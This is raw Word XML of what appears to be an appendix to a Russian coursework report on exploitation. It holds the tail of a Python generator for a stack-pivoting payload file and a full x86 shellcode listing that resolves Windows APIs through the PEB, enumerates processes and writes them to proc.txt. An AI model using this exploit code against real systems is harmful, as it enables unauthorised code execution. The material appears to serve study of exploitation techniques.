          <w:p w14:paraId="0848B51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6857D2A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with open("config_10", "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>wb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>") as f:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C3A0DD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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A31C68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5299DF3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print(f"</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Файл</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>сгенерирован</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Метод</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">: Stack Pivoting. </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Размер</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> payload: {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>payload_body</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>)}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DBDDA3F" w14:textId="77777777" w:rsidR="00C52126" w:rsidRDefault="00C52126" w:rsidP="00401C70">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3CD62396" w14:textId="74944C5C" w:rsidR="00401C70" w:rsidRPr="00EB0E0A" w:rsidRDefault="00401C70" w:rsidP="00656D19">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784256A3" w14:textId="77777777" w:rsidR="00401C70" w:rsidRPr="00EB0E0A" w:rsidRDefault="00401C70">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB0E0A">
        <w:rPr>
          <w:highlight w:val="white"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="365BA34B" w14:textId="33EFD97A" w:rsidR="00656D19" w:rsidRDefault="00401C70" w:rsidP="00401C70">
      <w:pPr>
        <w:pStyle w:val="affff1"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение Б</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D098D70" w14:textId="6A1428D0" w:rsidR="0018105F" w:rsidRDefault="0018105F" w:rsidP="0018105F">
      <w:pPr>
        <w:pStyle w:val="affffd"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>Листинг программы «Шелл-код»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1C70" w14:paraId="60615A43" w14:textId="77777777" w:rsidTr="00401C70">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9345" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BDCA52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[BITS 32]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AB9652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start:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="756A265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xor eax, eax             </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="044CBE2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eax, [fs:eax + 30h]  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F27B80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eax, [eax + 0Ch]     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01CAF66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esi, [eax + 14h]    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="625B807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lodsd                    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B5B63A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xchg eax, esi           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C0A6D5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lodsd                   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27113F4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ebx, [eax + 10h]     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BB65C9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edx, [ebx + 3Ch] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E0BE59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add edx, ebx         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2974145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edx, [edx + 78h] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="653E48A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add edx, ebx         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21769EE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esi, [edx + 20h] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EBA515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add esi, ebx         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CCF5F8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xor ecx, ecx         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A8FBD1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6756046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find_function_loop:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69F3D69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edi, [esi + ecx * 4]    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A7BF2F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add edi, ebx                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1023AEB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cmp dword [edi], 0x50746547</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43F3626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jnz next_function           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B13BA4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cmp dword [edi + 4], 0x41636F72</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EDEF97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jnz next_function           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B15D7E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cmp dword [edi + 8], 0x65726464</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="100861E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jz find_function_finished    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CA0C28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next_function:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E54305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inc ecx                      </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6ECFCF1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jmp find_function_loop       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3547F8B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251CBAF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find_function_finished:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A3DDB6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edx, [ebx + 3Ch]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12166B9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edx, ebx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="012B292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edx, [edx + 78h]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FD74D3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edx, ebx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31BABEE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edi, [edx + 24h] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6439991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add edi, ebx           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B257D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cx, [edi + ecx * 2] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24E119E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edi, [edx + 1Ch] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AAB158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edi, ebx          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40666DE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eax, [edi + ecx * 4] </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3493332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add eax, ebx             </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E1E18C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ebp, eax </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33A9CB0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13DDEC7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sub esp, 0x1000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43C5317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test [esp], eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F06E6A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sub esp, 0x1000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46CBD21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test [esp], eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1447770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sub esp, 0x1000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14AE03A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esi, esp             </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72CE519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701DE63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; --- 1. CreateToolhelp32Snapshot ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4616120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0x00000000          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57BE004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0x746f6873          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F1DF2B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0x70616e53          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AF6576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0x3233706c          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47834E2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0x65686c6f          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="135AECB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0x6f546574          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2236FBB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lastRenderedPageBreak/>
              <w:t>    push 0x61657243          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3262BAC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esp                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10A31E7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ebx                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD5408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call ebp                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C187D4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esp, 28              </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="528C47D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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AAD04F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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA3FC8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call eax                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="501B927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[esi], eax     </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CCFE89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5F1B4D4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; --- 2. Process32First ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3571C91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0x00007473          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="693C0E5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0x72694632          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FFFB03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0x33737365          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F1740A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0x636f7250          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A186CB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esp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="260F496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ebx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="337EB7C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ebp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F5C0C5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esp, 16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2952BD1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[esi + 4], eax </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="662D513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7391320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; --- 3. Process32Next ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2438ECD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0x00000074          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36E3CEA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0x78654e32          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C7B938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0x33737365          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD7074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0x636f7250          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="533FA80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esp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C1D0D7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ebx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1199BB8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ebp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51BB560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esp, 16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AE0F2D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[esi + 8], eax </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42CFD0F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3991089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; --- 4. OpenProcess ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C03A02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0x00737365          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02232E4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0x636f7250          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AB3A2F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0x6e65704f          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78801F5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esp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="663F719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ebx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AF5D38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ebp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33C0867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esp, 12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BF31AF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[esi + 12], eax </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="385EFF4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2F74167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; --- 5. IsWow64Process ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="138DCA1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0x00007373          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="418F84F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0x65636f72          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39EBD33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0x50343677          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2711B6C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0x6f577349          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9D97B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esp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51D1C30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ebx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7734FB3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ebp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4696C5A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esp, 16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="212A3D0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[esi + 16], eax </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C737AA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253514F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[esi + 0x20], 0x128 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0072E9E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lea edi, [esi + 0x160]        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="538515E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byte [edi], 0             </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33A5C22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7915BD1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lea eax, [esi + 0x20]    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5204D9C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eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F24666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eax, [esi]           </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5279BB4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eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2312C40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eax, [esi + 4]       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21F5FDB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call eax                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7513BE9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test eax, eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1183373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lastRenderedPageBreak/>
              <w:t>    jz finish_process        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71E91D5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1717FBA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process_loop:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E1D4C1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lea ecx, [esi + 0x44]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14FD112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copy_name:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B88F11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al, byte [ecx]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F96085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test al, al</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19CA337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jz check_bitness         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D262C5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byte [edi], al</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C80991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inc ecx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C7EE9B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inc edi</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD8045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jmp copy_name</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="492A692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7B119D5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check_bitness:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DCE031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eax, [esi + 0x28]    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1358BC1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eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E35274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</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6831D0D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0x1000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A25014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eax, [esi + 12]      </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58AFA7D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eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65C7884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test eax, eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32C4C29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jz append_newline        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="416A2C2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212C42A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sub esp, 4               </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A052DB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ecx, esp             </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73B7E91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ecx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71773F1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eax                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06BB9CA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eax, [esi + 16]      </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6674DFD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eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CBD52D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pop eax                  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7620D4D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test eax, eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6492B6F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jnz process_x86          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B8200A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756058E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process_x64:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C3FFD3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[edi], 0x36785b20   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DE2430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[edi + 4], 0x00005d34 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C3357A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edi, 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18B5E31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jmp append_newline</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14D642F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7AD32A5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process_x86:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="120BF8B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[edi], 0x38785b20   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7051457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dword [edi + 4], 0x00005d36 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78E1EC6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edi, 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E36D1B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6817DFB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append_newline:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76EDB2C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word [edi], 0x0A0D</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17F0C448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edi, 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AA6A9F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byte [edi], 0        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D432B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05AA6E3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lea eax, [esi + 0x20]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76534F1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eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="750DB25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eax, [esi]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="297EB79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eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D56514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eax, [esi + 8]       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7378214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eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62A2560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test eax, eax</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08CAEFF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jnz process_loop         </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C636FC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3DC4EC5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finish_process:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AC33A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; --- 1. </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Находим</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> CreateFileA ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57466A4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0x0041656c          ; "leA\0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4368131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0x69466574          ; "teFi"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AB219E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0x61657243          ; "Crea"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9868A4" w14:textId="77777777" w:rsidR="00EB0E0A" w:rsidRPr="00EB0E0A" w:rsidRDefault="00EB0E0A" w:rsidP="00EB0E0A">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>mov</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>ecx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>esp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0AF33E7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  <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t>push ecx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B0EBE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ebx                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E5689A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call ebp                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28EBC73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esp, 12              </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7846C3B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[esi + 0x10], eax    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DCE9CB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0A60027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; --- 2. </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Находим</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> WriteFile ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="204B2FC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0x00000065          ; "e\0\0\0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F73AC2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0x6c694665          ; "eFil"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="139FE7A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0x74697257          ; "Writ"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7886ADD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ecx, esp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61C7BF1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ecx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46FB836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ebx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39EC749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ebp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F416F7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esp, 12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C5EF5D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[esi + 0x14], eax    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7208F98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5D59055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; --- 3. </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Находим</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> CloseHandle ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B2E79B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0x00656c64          ; "dle\0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00FFB07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0x6e614865          ; "eHan"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C221A1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0x736f6c43          ; "Clos"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="735032D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ecx, esp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66BBF80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ecx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5426800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ebx</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="640B615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call ebp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23A13E2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add esp, 12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BDA8DA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[esi + 0x18], eax    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A79029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5F64C98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; --- 4. </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>Создаем</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>файл</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve"> "proc.txt" ---</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3894DB4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0x00000000          ; "\0\0\0\0"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41ACD6F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0x7478742e          ; ".txt"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EC05120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0x636f7270          ; "proc"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52F4E85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mov ecx, esp             </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1882B99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6A1670C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0                   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79F07DF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0x80                </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A1D757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2                   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77308FD3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0                   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D0A8EE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0                   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="391A354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0x40000000          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D7A9F1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ecx                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2435F4F9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eax, [esi + 0x10]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4503B01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call eax                 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39879F66" w14:textId="77777777" w:rsidR="00EB0E0A" w:rsidRPr="00EB0E0A" w:rsidRDefault="00EB0E0A" w:rsidP="00EB0E0A">
            <w:pPr>
              <w:pStyle w:val="af1"/>
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t>add</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
                <w:highlight w:val="white"/>
                <w:lang w:val="ru-RU"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00EB0E0A">
              <w:rPr>
